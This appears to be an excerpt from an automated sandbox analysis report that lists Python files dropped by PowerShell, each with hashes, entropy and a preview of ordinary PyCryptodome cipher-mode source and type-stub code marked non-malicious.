                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IC/5xlJT9O++U4/2+2U4+B0+gvz:0rskrs9VqNzJJGTe+2T+B8
                                                                                                                                                                                                              MD5:209DF7941CDE5D9B199BA813CF06654C
                                                                                                                                                                                                              SHA1:034EBECB7D074076120DC34FC27BCBB507C80C71
                                                                                                                                                                                                              SHA-256:AC4572721D16342B0F4B4B81E06F1108DC391736F68B5F723C176F414002238C
                                                                                                                                                                                                              SHA-512:AF910413AA808464A5140935871576853E9D13DB06C14BD21212C420A4CCF367FDF73AA69231540391E76BE04425B1741A5FBD827E1F63AD2861BA06C611D55B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):716
                                                                                                                                                                                                              Entropy (8bit):4.751012185181633
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBw1k1Jal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                              MD5:374718D8A7601AFF8E74B7B67F517B38
                                                                                                                                                                                                              SHA1:BF6DDE08FEABEA4908869E1790DF38DDAB69CADF
                                                                                                                                                                                                              SHA-256:32C4737F3237691DAC8534EA506CD139E17FA709139B07A3CDF3513EBC850DCC
                                                                                                                                                                                                              SHA-512:9966959122F804F46CD4A594AB3F6D54B103236AB15BF80D97C63B30AA02CD0E5E2E46ACC9B38B85237CA0E6147020C93A66C069401FA47087BFB29EFE3EB82B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25057
                                                                                                                                                                                                              Entropy (8bit):4.6777979456783525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/I+Nn1nXrBamtA6/c1VaO37n2x4Cg4wCy4g3NeVRWPv8GvvBsm:0rskrs9Vqj1n71/wH2x4swgg9eXWHzv5
                                                                                                                                                                                                              MD5:93F47C909B97F816487F5855580C6766
                                                                                                                                                                                                              SHA1:62C1E3656C1A2376D1F806A5E9075EE752D3A0E8
                                                                                                                                                                                                              SHA-256:58A197784FC8D0CDCA227615B004F292313F42BF41CDCEC8FA8F258811774A38
                                                                                                                                                                                                              SHA-512:AAA3A1C061BF8BBB2035321219541E24FE7585C8357112C187C11274B3F27DED4C80D04F909B97E492711D8E74569930E970BE28814CDB0DF1C0B2A628797709
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1647
                                                                                                                                                                                                              Entropy (8bit):4.397477650476907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                                                                                              MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                                                                                              SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                                                                                              SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                                                                                              SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11034
                                                                                                                                                                                                              Entropy (8bit):4.521727406108344
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dSMFQHvo5i4mILXEwOOscx2JL5qwG47W9ytU4p2EVQ57T1qytU4eputAVQqWFZb0:dSCQHvSyOH2JLcOq+U46kYU4o7KZDmJ
                                                                                                                                                                                                              MD5:732AFC2DA4808607732C573DA61C1303
                                                                                                                                                                                                              SHA1:0BF7AC4B48B997D003F1B5968A0DEC744D7D8564
                                                                                                                                                                                                              SHA-256:56B7966054D1D7353546FA480BC0BB11A70E1BF01E909568CB00DC994CE30058
                                                                                                                                                                                                              SHA-512:BA9440E5C1DEF9D224AC34FFB6C118AA729F488101247E8AE94C7E8870347AED3846BE225B38C32B0FFFB1AAD912AE3D24A8B88DE1516752236FE4711F2B274B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_cfb.py : CFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):757
                                                                                                                                                                                                              Entropy (8bit):4.692214100146291
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBw1k1Jal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REPZjT3lGNAYsEHnRNne3yFnR3Fne3l
                                                                                                                                                                                                              MD5:C277ABB0D41936FA2B2C6C5A7555C9B2
                                                                                                                                                                                                              SHA1:87B8E4314BBB63E156CB1E2DB3BBE318B7B13803
                                                                                                                                                                                                              SHA-256:15EE428028300FCB807AF557DB278F229C260EC98E8AE1971661B436CFE5C2A9
                                                                                                                                                                                                              SHA-512:1D2BF9AE0D89776EE0D2622A520C6FA0590C5B900419502F55679AEEEF2D53DF468894DB87867AD9596E79D6E4CB04D3CCCA3F31B25D62CEB4222B92DBC544F1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16245
                                                                                                                                                                                                              Entropy (8bit):4.424470034057399
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:d5QHvCtxqH2LakMiITNEriO+gU46o2U4ozCgShWWwBil3iYelIisiSSZD:DeIF7AYT6o2TozrShGaSnlL
                                                                                                                                                                                                              MD5:6CC48CA12550FD08577DA1995C8995DC
                                                                                                                                                                                                              SHA1:73A09E90D9F7517023509F36AB5A4613051E27AA
                                                                                                                                                                                                              SHA-256:1E47456421A1073CE1298AFBAF9E2FF228A7164D842C66AD75C96DB4C9D2ED77
                                                                                                                                                                                                              SHA-512:BA2F15BD85A01C8134D46E99422954B3205D570957CFE6ECB2BC6BCD4E6D394FB73D1F2B604E44AE25D2C88A9A64005CBDFC46DC0DE77270FF392F4A7B7F01ED
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ctr.py : CTR mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):831
                                                                                                                                                                                                              Entropy (8bit):4.595725224881154
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1REPZjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:YVLcZVjTvesLeM
                                                                                                                                                                                                              MD5:22DC24EE5319AB0ACF3D1AEFEE2854C5
                                                                                                                                                                                                              SHA1:91E1F26CE9FDA76A71AC3D761AAD3DFA1BA64996
                                                                                                                                                                                                              SHA-256:AB8697E3CDA28729D9CB6A6545EA1E3FCDC184C9E07BFB70D9FAEE38F27012EF
                                                                                                                                                                                                              SHA-512:3E4DAC2C8C87A11C783DAAC9F678B2A50220857636BDB7A9B1D23DF9F8421A9DC8BF63CF6FB6BD1EB4561615E712F19EC932180D0BC398F7AB7F2E5CD62BD32F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14893
                                                                                                                                                                                                              Entropy (8bit):4.675503892468894
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/InLwPVpgaMYO4SU4sU4pzzRWPvguXNYPR:0rskrs9VqOwk4STsTpz1WHgw6
                                                                                                                                                                                                              MD5:F46B49721DEB8AE5C96A80DE5B4EC503
                                                                                                                                                                                                              SHA1:87D6C7F87868C9F6DBEAB694BC16E5EDA2E52A32
                                                                                                                                                                                                              SHA-256:4F4F61208DAB1A58BA3A03E70DE3B9E31E5274D132BEA3692FAACB0E736404DC
                                                                                                                                                                                                              SHA-512:E3301F7BFC6D21EE359726EC7DC5197784DC603F683BDA9A8133BC0809AFC2EC81DAC7F1F9B9E2DBD550AEA392B81D4DC866FF93609EC84DA41015598E553DE5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1590
                                                                                                                                                                                                              Entropy (8bit):4.436811038410909
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                                                                                              MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                                                                                              SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                                                                                              SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                                                                                              SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8541
                                                                                                                                                                                                              Entropy (8bit):4.500745119245566
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dBFQHvoWnpqW8XSXMxJYuwG2m0/EfQb7nk+qIbpktAV7+qWKWJRI:dfQHv1z8XjJYuwVkZi7Z1WJRI
                                                                                                                                                                                                              MD5:6CBC08E85C2F37D641BE890F91B0C1F3
                                                                                                                                                                                                              SHA1:54525C6CFB8431F5249FDDDE29B1CC27107F1D68
                                                                                                                                                                                                              SHA-256:D0A75E9CC56230E1C044411A1A6760FF7678D449E1263AEFFEF7E2752E360FF8
                                                                                                                                                                                                              SHA-512:89E08B33A85FDDFA417CD6D3BF7C1BBEC94F280C5D2DD43AE82D9A12C4CC25A9057B0E87F50FF27F1491C18C754AEFA7DAA190EEB0EDD3BACCBCFD6A5ABE0A96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ecb.py : ECB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):615
                                                                                                                                                                                                              Entropy (8bit):4.8565980350251685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBw1k1Jal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                                                                                              MD5:125B8830D549BBC165F15871922DE5E5
                                                                                                                                                                                                              SHA1:183D164CB3135E0DD3A27F91D20EB39DD01B2B64
                                                                                                                                                                                                              SHA-256:8A8A5ED79EFAFC9CB7A3AD95BAE1ABCAA4E447776760778E91FDD6E510714352
                                                                                                                                                                                                              SHA-512:F7B871B62D73B4AE40E3FD6FD65C8078F10464D9976E9760CC7B34541A1DFF43548DA0B31B47BA5A55C50033B0D5DE6D3549C594E2792D036907949CA6DF0C5B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21961
                                                                                                                                                                                                              Entropy (8bit):4.722955510499751
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:0rskrs9Vqjk6xv931hir4YTTTrTXWMfDR/:0r6qjj3qr5W4/
                                                                                                                                                                                                              MD5:C82F2145CE418812E8C878FED362D392
                                                                                                                                                                                                              SHA1:2157FBA32079726D8A5AF845D68CFF9A9415D017
                                                                                                                                                                                                              SHA-256:8899DCAE0739C3E5C87470B6A4A0552EDDCFAE3DF957AE497BF36DC27D036B62
                                                                                                                                                                                                              SHA-512:BB911A617527391180E2EEA19EF1D4F310F2C05116D64D137C51F7E599BC5A554E6E8EE2FD7F7527F1D97B862980B1AE1B262168DD196F74846F8B9BB54F306B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1586
                                                                                                                                                                                                              Entropy (8bit):4.431900531457141
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                                                                                              MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                                                                                              SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                                                                                              SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                                                                                              SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20511
                                                                                                                                                                                                              Entropy (8bit):4.486050917892721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IRqz86shyyJHDrlKXhf5dOvbY40S/SHfp+afbRewJse9q/bqO5fa:0rskrs9VqQqIohhd6Y4OLe8seyZ5fhp2
                                                                                                                                                                                                              MD5:E43E20E3F39C03CEAFE713463C2C36A9
                                                                                                                                                                                                              SHA1:33EE5A2D21CB2DCC6F5F600AF151F21207C50DD8
                                                                                                                                                                                                              SHA-256:3263550C7ADE01E3088BC5773101C9D8F6B24628916EBC58CE763F3029D9D9FA
                                                                                                                                                                                                              SHA-512:9B48FE7329A36B628DEC3BAB36A673F9398814DFDBD6B1344AC8E2AA41B1EF3D2A3492AC4AFF9ED9D7F0E9A970B0956F31CC63698F3B0A3DF4CFA5C32AA2E0FA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1267
                                                                                                                                                                                                              Entropy (8bit):4.510576229003074
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                                                                                              MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                                                                                              SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                                                                                              SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                                                                                              SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                                                                                              Malicious:false
